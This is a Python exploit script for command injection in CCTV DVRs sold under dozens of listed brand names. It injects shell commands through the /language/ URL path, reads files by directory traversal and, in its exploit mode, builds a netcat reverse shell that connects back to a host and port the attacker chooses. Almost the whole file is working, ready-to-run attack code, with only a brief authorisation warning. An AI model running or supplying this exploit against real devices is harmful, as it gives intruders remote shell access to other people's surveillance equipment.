#!/usr/bin/python
# Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
'''
Vendors List

Ademco
ATS Alarmes technolgy and ststems
Area1Protection
Avio
Black Hawk Security
Capture
China security systems
Cocktail Service
Cpsecured
CP PLUS
Digital Eye'z no website
Diote Service & Consulting
DVR Kapta
ELVOX
ET Vision
Extra Eye 4 U
eyemotion
EDS
Fujitron
Full HD 1080p
Gazer
Goldeye
Goldmaster
Grizzly
HD IViewer
Hi-View
Ipcom
IPOX
IR
ISC Illinois Security Cameras, Inc.
JFL Alarmes
Lince
LOT
Lux
Lynx Security
Magtec
Meriva Security
Multistar
Navaio
NoVus
Optivision
PARA Vision
Provision-ISR
Q-See
Questek
Retail Solution Inc
RIT Huston .com
ROD Security cameras
Satvision
Sav Technology
Skilleye
Smarteye
Superior Electrial Systems
TechShell
TechSon
Technomate
TecVoz
TeleEye
Tomura
truVue
TVT
Umbrella
United Video Security System, Inc
Universal IT Solutions
US IT Express
U-Spy Store
Ventetian
V-Gurad Security
Vid8
Vtek
Vision Line
Visar
Vodotech.com
Vook
Watchman
Xrplus
Yansi
Zetec
ZoomX
'''
from __future__ import print_function

import optparse
import socket
from re import compile
from socket import timeout
from sys import argv

try:
    # Python 3
    from urllib.parse import urlparse
except ImportError:
    # Python 2, the interpreter this script was originally written for
    from urlparse import urlparse

import requests
from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
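def main():
    """Command-line entry point: ``<target-url> [options]``.

    ``-c/--check`` probes the target for the ``/language/`` command injection;
    ``-e/--exploit HOST:PORT`` fires the connect-back payload. Both may be
    combined, in which case the exploit is only sent if the check passed.
    Usage errors exit with status 1 (the original exited with 0).

    WARNING: the check is not passive -- it executes commands on the device
    and writes, reads back and deletes a marker file there (see
    ``_check_target``). Only run this against devices you are authorised to
    test.
    """
    optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
    optparser.add_option('-c', '--check', action="store_true", dest="checkvuln", default=False,
                         help="Check if target is vulnerable")
    optparser.add_option('-e', '--exploit', action="store", type="string", dest="connback",
                         help="Fire the exploit against the given target URL")
    (options, args) = optparser.parse_args()

    if not args:
        optparser.print_help()
        raise SystemExit(1)
    target = args[0]

    # urlparse() does not raise on garbage; a missing hostname is the signal
    # that the argument was not a usable http(s) URL.
    target_url = urlparse(target)
    if not target_url.hostname:
        print("[X] supplied target \"%s\" is not a valid URL" % target)
        optparser.print_help()
        raise SystemExit(1)

    # Bound connects/reads against an unresponsive device via the socket-level
    # default timeout (the requests calls below rely on it).
    socket.setdefaulttimeout(10)

    if options.checkvuln and not _check_target(target_url):
        return  # check failed or target unreachable: do not fire the exploit

    if options.connback is not None:
        connback = _parse_connback(options.connback)
        if connback is None:
            print("[X] given connect back \"%s\" should be in the format for host:port" % options.connback)
            optparser.print_help()
            raise SystemExit(1)
        _fire_exploit(target_url, connback[0], connback[1])

    if not options.checkvuln and options.connback is None:
        # Neither action was requested; the original silently did nothing.
        optparser.print_help()


def _cmd_url(target_url, path):
    """Join the target's scheme and netloc with a raw *path* (sent unencoded)."""
    return '%s://%s%s' % (target_url.scheme, target_url.netloc, path)


def _check_target(target_url):
    """Return True if the target executes injected commands, else False.

    Writes ``1`` into a file ``test`` through the ``/language/`` handler, reads
    it back via a ``..`` traversal to ``/mnt/mtd/test`` (so the handler is
    assumed to run with ``/mnt/mtd`` as its working directory -- an assumption
    inherited from the original check), then removes the marker. Removal is
    attempted whenever the write went out, even if the read fails.
    """
    netloc = target_url.netloc
    print("[!] Checking if target \"%s\" is vulnable..." % netloc)
    wrote = False
    try:
        raw_url_request(_cmd_url(target_url, '/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'))
        wrote = True
        response = raw_url_request(_cmd_url(target_url, '/../../../../../../../mnt/mtd/test'))
    except (ConnectionError, Timeout, timeout) as e:
        print("[X] Unable to connect. reason: %s. exiting..." % e)
        return False
    finally:
        if wrote:
            _remove_marker(target_url)

    body = response.text
    # Guard the index: an empty body (traversal blocked, empty error page, ...)
    # used to raise IndexError here instead of giving a clean verdict.
    if not body or body[0] != '1':
        print("[X] Expected response content first char to be '1' got %s. exiting..." % body)
        return False
    print("[V] Target \"%s\" is vulnerable!" % netloc)
    return True


def _remove_marker(target_url):
    """Best-effort ``rm test`` on the device; failure is reported, not fatal."""
    try:
        raw_url_request(_cmd_url(target_url, '//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'))
    except (ConnectionError, Timeout, timeout) as e:
        print("[!] Could not remove marker file 'test' from the target: %s" % e)


def _parse_connback(connback):
    """Validate ``HOST:PORT`` and return ``(host, port)`` strings, or None.

    Host and port are interpolated into a shell command executed on the
    device, so the *whole* string is anchored to ``[A-Za-z0-9.-]+:[0-9]+``
    (the original only searched for a match somewhere inside it) and the
    port must be 1-65535. Anything else would break the injected command or
    let a typo smuggle extra shell syntax into it.
    """
    match = compile(r'(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)\Z').match(connback)
    if match is None or not 0 < int(match.group('port')) <= 65535:
        return None
    return match.group('host'), match.group('port')


def _fire_exploit(target_url, host, port):
    """Send the three-stage connect-back payload to the target.

    Stage 1 writes ``nc HOST PORT`` into a file ``e`` on the device, stage 2
    appends ``-e $SHELL``, stage 3 runs the assembled line -- a netcat
    reverse shell to ``host:port``. *host* and *port* must already be
    validated (see ``_parse_connback``); they go straight into the command.
    """
    stages = (
        '/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a' % (host, port),
        '/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a',
        '/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s',
    )
    try:
        for path in stages:
            raw_url_request(_cmd_url(target_url, path))
    except (ConnectionError, Timeout, timeout) as e:
        print("[X] Unable to connect reason: %s. exiting..." % e)
        # The original fell through and announced success here; a stage that
        # never reached the device means no shell is coming.
        return

    print("[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"
          % (host, port))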
# Send the URL verbatim: requests' URL encoding would mangle the shell-injection payload.
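def raw_url_request(url, timeout=10):
    """GET *url* exactly as given, bypassing requests' URL normalisation.

    ``prepare()`` would percent-encode parts of the payload (e.g. the braces
    in ``${IFS}`` and the quotes in the exploit stages), neutralising the
    command injection and traversal this tool depends on. Re-assigning
    ``.url`` after ``prepare()`` makes the string go out byte-for-byte, so the
    caller is responsible for building a URL the server will accept.

    Args:
        url: Fully-qualified URL, sent verbatim.
        timeout: Per-request connect/read timeout in seconds; ``None`` waits
            indefinitely (apart from any ``socket.setdefaulttimeout``).

    Returns:
        The ``requests.Response`` for the request.

    Raises:
        ``requests.exceptions.RequestException`` subclasses (ConnectionError,
        Timeout, ...) on network failure.
    """
    prepared = requests.Request('GET', url).prepare()
    prepared.url = url  # overwrite the normalised/encoded form
    session = requests.Session()
    try:
        return session.send(prepared, timeout=timeout)
    finally:
        session.close()  # the original leaked the pooled connection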
if __name__ == '__main__':
    # Entry point: argument parsing and all network activity live in main().
    main()